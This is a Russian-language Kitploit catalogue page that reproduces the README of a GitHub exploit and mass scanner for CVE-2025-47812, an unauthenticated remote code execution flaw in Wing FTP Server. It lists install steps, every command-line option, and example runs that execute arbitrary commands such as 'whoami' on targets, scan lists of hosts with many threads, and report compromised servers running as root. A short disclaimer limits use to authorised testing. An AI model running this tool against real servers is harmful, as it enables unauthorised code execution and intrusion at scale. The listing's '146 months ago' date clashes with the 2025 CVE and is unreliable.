Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-47812 — Эксплойт и сканер для CVE-2025-47812, нацеленный на неаутентифицированное удалённое выполнение кода в Wing FTP Server, с поддержкой одиночных целей, массового сканирования, прокси и нескольких форматов вывода. | Kitploit
Инструменты/GitHubGitHub/0xjuarez/cve-2025-47812
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHub0xjuarez/cve-2025-47812

CVE-2025-47812

Эксплойт и сканер для CVE-2025-47812, нацеленный на неаутентифицированное удалённое выполнение кода в Wing FTP Server, с поддержкой одиночных целей, массового сканирования, прокси и нескольких форматов вывода.

Репозиторий
146 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚀 Wing FTP Exploit - CVE-2025-47812

Улучшенный эксплойт для Wing FTP Server CVE-2025-47812 - неаутентифицированное удаленное выполнение кода (RCE)

🔧 Установка

Клонируйте этот репозиторий и перейдите в директорию:

root@kitploit:~
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt

Или просто скачайте скрипт CVE-2025-47812.py и запустите его.

🚀 Использование

root@kitploit:~
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]

Эксплойт для Wing FTP Server CVE-2025-47812 - улучшенная версия

опции:
  -h, --help            показать это сообщение
  -u URL, --url URL     целевой URL (напр. http://192.168.1.100:5466)
  -f FILE, --file FILE  файл со списком URL (по одному на строку)
  -c COMMAND, --command COMMAND
                        команда для выполнения (по умолчанию: echo CVE-2025-47812)
  -U USERNAME, --username USERNAME
                        имя пользователя (по умолчанию: anonymous)
  -P PASSWORD, --password PASSWORD
                        пароль (по умолчанию: пусто)
  --check               режим проверки: только выяснить, уязвим ли (использует безвредную команду)
  -v, --verbose         подробный режим (показывает детали)
  --proxy PROXY         прокси (напр. http://127.0.0.1:8080)
  --timeout TIMEOUT     таймаут в секундах (по умолчанию: 10)
  -o OUTPUT, --output OUTPUT
                        выходной файл для сохранения результатов
  --output-format {txt,json,csv}
                        формат вывода (по умолчанию: txt)
  --threads THREADS     количество потоков для сканирования нескольких целей (по умолчанию: 5)
  --no-progress         скрыть индикатор прогресса

🎯 Примеры использования

Проверка одной цели и выполнение команды:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v

Режим проверки (только обнаружение уязвимости):

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check

Сканирование нескольких целей из файла:

root@kitploit:~
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json

Использование прокси и подробного режима:

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v

📁 Структура файла с целями

Файл должен содержать по одному URL на строку, например:

root@kitploit:~
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.myserver.com:5466

📊 Форматы вывода

TXT

root@kitploit:~
http://192.168.1.10:5466 - УЯЗВИМ - пользователь: root
http://192.168.1.11:5466 - БЕЗОПАСНО - Не уязвим

JSON

root@kitploit:~
[
  {
    "target": "http://192.168.1.10:5466",
    "vulnerable": true,
    "info": "пользователь: root"
  }
]

CSV

root@kitploit:~
Target,Vulnerable,Info
http://192.168.1.10:5466,True,пользователь: root

⚠️ Предупреждение

Этот эксплойт предназначен исключительно для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование данного инструмента против систем без явного согласия является незаконным и может повлечь серьезные юридические последствия. Авторы не несут ответственности за любое неправомерное использование.

🤝 Благодарности

  • Оригинальный автор: Sheikh Mohammad Hasan (4m3rr0r) – обнаружение и базовый эксплойт.
  • Улучшения и рефакторинг: 0xJuarez – добавлены функции массового сканирования, цветовая поддержка, поддержка прокси, несколько форматов вывода и улучшения удобства использования.

Если вам нравится эта работа, не забудьте поставить звезду ⭐ на GitHub!

📄 Лицензия

Этот проект лицензирован по лицензии MIT – подробности в файле LICENSE.

Скачать инструмент